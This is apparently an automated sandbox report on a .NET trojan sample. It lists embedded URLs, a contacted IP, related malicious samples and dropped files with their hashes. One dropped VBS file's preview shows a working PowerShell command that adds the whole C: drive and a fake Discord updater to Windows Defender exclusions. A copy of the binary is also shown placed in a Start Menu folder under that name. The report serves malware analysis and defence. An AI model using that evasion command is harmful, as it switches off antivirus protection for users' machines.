http://www.monotype.%	0%	Avira URL Cloud	safe
http://www.carterandcone.comdd	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comcemfE	0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersL	0kEuVjiCbh.exe, 00000001.00000003.208922980.0000000005560000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cntuE	0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/bThe	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnM	0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/Hebr	0kEuVjiCbh.exe, 00000001.00000003.207272862.000000000553B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.fontbureau.compE	0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comal	0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tiro.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	0kEuVjiCbh.exe, 00000001.00000003.207839947.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/fE	0kEuVjiCbh.exe, 00000001.00000003.207469413.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.com(	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://curl.haxx.se/docs/http-cookies.html	0kEuVjiCbh.exe, 0kEuVjiCbh.exe, 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp	false		high
http://livesplit.org/	0kEuVjiCbh.exe	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersR	0kEuVjiCbh.exe, 00000001.00000003.208983955.0000000005560000.00000004.00000001.sdmp	false		high
http://www.sajatypeworks.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comTCA	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/jp/TE	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersers	0kEuVjiCbh.exe, 00000001.00000003.208755149.0000000005560000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comC	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cny	0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comht	0kEuVjiCbh.exe, 00000001.00000003.206107547.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/TE	0kEuVjiCbh.exe, 00000001.00000003.207272862.000000000553B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comR	0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comTC1	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnl-g~	0kEuVjiCbh.exe, 00000001.00000003.205494812.000000000555E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0kEuVjiCbh.exe, 00000001.00000002.327234439.0000000002571000.00000004.00000001.sdmp	false		high
http://www.carterandcone.como.	0kEuVjiCbh.exe, 00000001.00000003.206107547.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comN	0kEuVjiCbh.exe, 00000001.00000003.206637249.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designerst	0kEuVjiCbh.exe, 00000001.00000003.208922980.0000000005560000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comL	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn_tr	0kEuVjiCbh.exe, 00000001.00000003.206010852.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.jiyu-kobo.co.jp//h(	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comf	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comd	0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comc	0kEuVjiCbh.exe, 00000001.00000003.206669888.0000000005560000.00000004.00000001.sdmp	false		unknown
http://www.carterandcone.comte	0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comTC	0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.206144045.0000000005562000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/xE	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micro	powershell.exe, 0000000F.00000003.370635842.0000000005578000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.comp	0kEuVjiCbh.exe, 00000001.00000003.206775258.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/pE	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.monotype.%	0kEuVjiCbh.exe, 00000001.00000003.208269954.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.comdd	0kEuVjiCbh.exe, 00000001.00000003.206400818.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/jp/	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.coma	0kEuVjiCbh.exe, 00000001.00000003.324580096.0000000005539000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 0000000F.00000003.373305758.00000000033BE000.00000004.00000001.sdmp	false		high
http://www.carterandcone.comm	0kEuVjiCbh.exe, 00000001.00000003.206551340.0000000005560000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		unknown
http://www.fontbureau.com/designers/cabarga.htmlN	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comorm	0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp, 0kEuVjiCbh.exe, 00000001.00000003.207720541.000000000553C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	0kEuVjiCbh.exe, 00000001.00000002.338045136.0000000005620000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/JE	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.como.#	0kEuVjiCbh.exe, 00000001.00000003.206064152.0000000005560000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers:	0kEuVjiCbh.exe, 00000001.00000003.208727567.0000000005560000.00000004.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/jp/fE	0kEuVjiCbh.exe, 00000001.00000003.207565294.000000000553A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers0	0kEuVjiCbh.exe, 00000001.00000003.209231763.0000000005560000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/	0kEuVjiCbh.exe, 00000001.00000003.208702779.0000000005560000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.30.28	unknown	Netherlands		209623	DAVID_CRAIGGG	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	450613
Start date:	19.07.2021
Start time:	13:36:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	0kEuVjiCbh.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@14/11@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 3.6% (good quality ratio 1.6%) Quality average: 24.3% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 65% Number of executed functions: 153 Number of non-executed functions: 241
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:37:13	API Interceptor	551x Sleep call for process: 0kEuVjiCbh.exe modified
13:38:22	API Interceptor	34x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DAVID_CRAIGGG	RFQ_Order WT013 - A11197322,pdf.exe	Get hash	malicious	Browse	185.244.30.18
	ORDER.exe	Get hash	malicious	Browse	185.140.53.132
	DHL_119040 receipt document,pdf.exe	Get hash	malicious	Browse	185.244.30.18
	Img 673t5718737.exe	Get hash	malicious	Browse	91.193.75.202
	Parts_Enquiry_450kr6CRT.vbs	Get hash	malicious	Browse	185.140.53.169
	ltemsreceipt975432907.exe	Get hash	malicious	Browse	185.244.30.19
	H194 #U5146#U57fa - Payment.exe	Get hash	malicious	Browse	185.140.53.135
	Parts-Enquiry_OYU08W0VCWRDLPA.vbs	Get hash	malicious	Browse	185.140.53.169
	OneDrive.exe	Get hash	malicious	Browse	185.140.53.194
	CVhssiltQ9.exe	Get hash	malicious	Browse	185.140.53.9
	rz89FRwKvB.exe	Get hash	malicious	Browse	185.244.30.92
	doc030WA0004-55YH701-75IMG0012.exe	Get hash	malicious	Browse	185.140.53.230
	Request For Quotation.xlsx	Get hash	malicious	Browse	185.140.53.154
	CV CREDENTIALS.exe	Get hash	malicious	Browse	185.140.53.8
	ARRIVAL NOTICEPDF.EXCL.exe	Get hash	malicious	Browse	185.140.53.142
	WeASwOPOdNuVKbq.exe	Get hash	malicious	Browse	185.140.53.8
	New Order# 11009947810.exe	Get hash	malicious	Browse	185.140.53.216
	vEJ2Mfxn6p.exe	Get hash	malicious	Browse	185.140.53.134
	IMG 07052021 9059504.exe	Get hash	malicious	Browse	91.193.75.199
	G-DECL G50 EURL.xlsx	Get hash	malicious	Browse	185.140.53.134

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0kEuVjiCbh.exe.log Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1299
Entropy (8bit):	5.353835388147306
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4xLE4qE4j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzg
MD5:	D7428B0428DC5FA72A41122D265CFA0E
SHA1:	F485E2EC6F980F218063AF527724C088617B3B94
SHA-256:	C49B31FB28F5EC1B5A82D45DF4A0A88DBC26E468BA007D8E63C800BA69CC5FFC
SHA-512:	FD5BC965FD28DC219F2703726A34A7156D1B71B9199617136F936DD5DDBB2CA65175FBB4B761243635493D6CABE3069406B4D4473DEEB93FDCDA1F392345683B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.993014478972177
Encrypted:	false
SSDEEP:	384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
MD5:	8D5E194411E038C060288366D6766D3D
SHA1:	DC1A8229ED0B909042065EA69253E86E86D71C88
SHA-256:	44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
SHA-512:	21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	22176
Entropy (8bit):	5.601790004754982
Encrypted:	false
SSDEEP:	384:LtCDLq0y3KaxSBKn4wIyu7V9wmSJUeRu1BMkmNZkV7OXWDS5L4I5iuYs:/F4K4wtVmXetXW6wy
MD5:	6C96906A21458B0A3E3968FA63BBD2A5
SHA1:	39513643F32FCEEE5A772B0C84A1B36E327492A4
SHA-256:	4A11C3FAD3D6CF4E18B63E0226A9A88CEDE78CF40E9DBF86D56FBF729EDBE63F
SHA-512:	3770814B21DF58DDE442679FE2D6B63877FEE6FF71968A41C16BDC1B7AA3B931F484080F8CAD2C2D10553DDC85F343DA827DAE68836DDAF5411612268CAB6C48
Malicious:	false
Reputation:	low
Preview:	@...e...........a......... ...........i.9............@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2553856
Entropy (8bit):	7.964891082806616
Encrypted:	false
SSDEEP:	49152:332SKzAnWx/9H4GiwfQTuWwACHst9qxTcAGlrOOgl0UVODO:H2SKRZkLwACsqxTGlrOF0UVO
MD5:	1AA4EC7DB318A524FDFB5AAFF61A1031
SHA1:	BB804BE3028C6CBCC62E81FB70482C1A2444667F
SHA-256:	BA47F657A4745C96A62C444100D6C38BBFF772B47AC03E83DC3EF5D94BC1D77C
SHA-512:	42EF70B612DB878E77E32EFA9A0A485C5670452563B74E246902197EBA7F33823E0DA86EF5842115A84AD003EB1E018A2D9BF216E4545C5C3B32E90792D5E568
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 23%, Browse Antivirus: ReversingLabs, Detection: 48%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....1.`.................. ..t......N. .. .... ...@.. .......................`'...........@................................... .K..... .Dq...................@'...................................................... ............... ..H............text...T. .. .... ................. ..`.rsrc...Dq.... ..r.... .............@..@.reloc.......@'.......&.............@..B................0. .....H........5...,...........a..? .........................................j...9....&(....8....&8......s....(....t.....9....&8.........8......~.....z.(......:....&8....(....8.........0.......... .U...:....&.s.....:~...&.s....%o..........s......:e...&r...p(.......r3..p(....(..... .... ....s..... .....o....&. ....o....&rK..p(....8....(....8v....8}...(....8....*..0..m.......s....o....&.s.....s.....:?...&......s..... .... ....s..... .....o....&o....r...p.:....&8.....8....(....8

C:\Users\user\AppData\Local\Temp\0kEuVjiCbh.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\_Eyuqsjbfokebblx.vbs Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	186
Entropy (8bit):	5.017191793242518
Encrypted:	false
SSDEEP:	3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAuWXp5cViEaKC5SufyM1K/RFofD6J:FER/lFHsCu/eGgdEYmRAuWXp+NaZ5Suq
MD5:	99FAAAEA85F6233DA1080B3781C607D7
SHA1:	2BAE2C735432742F3FD9C32112525D080014FE62
SHA-256:	CBB2338F6A580D85121C2AE6A46CC3B699CD874270315506954F0F8B4E1D363D
SHA-512:	F510BD0F7F930438DEC2B17A75404AC11BCFF0A2601A4D9CC6E7E1E329595F5261A2CB4B7670F3131E166D1F0F9ECA604849E341E3442B844075832C02FF0740
Malicious:	true
Preview:	CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe'", 0, False

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ch1k2ebq.lw2.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t1okrqg2.qqg.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord\discupdate.exe Download File
Process:	C:\Users\user\Desktop\0kEuVjiCbh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2553856
Entropy (8bit):	7.964891082806616
Encrypted:	false
SSDEEP:	49152:332SKzAnWx/9H4GiwfQTuWwACHst9qxTcAGlrOOgl0UVODO:H2SKRZkLwACsqxTGlrOF0UVO
MD5:	1AA4EC7DB318A524FDFB5AAFF61A1031
SHA1:	BB804BE3028C6CBCC62E81FB70482C1A2444667F
SHA-256:	BA47F657A4745C96A62C444100D6C38BBFF772B47AC03E83DC3EF5D94BC1D77C
SHA-512:	42EF70B612DB878E77E32EFA9A0A485C5670452563B74E246902197EBA7F33823E0DA86EF5842115A84AD003EB1E018A2D9BF216E4545C5C3B32E90792D5E568
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 23%, Browse Antivirus: ReversingLabs, Detection: 48%
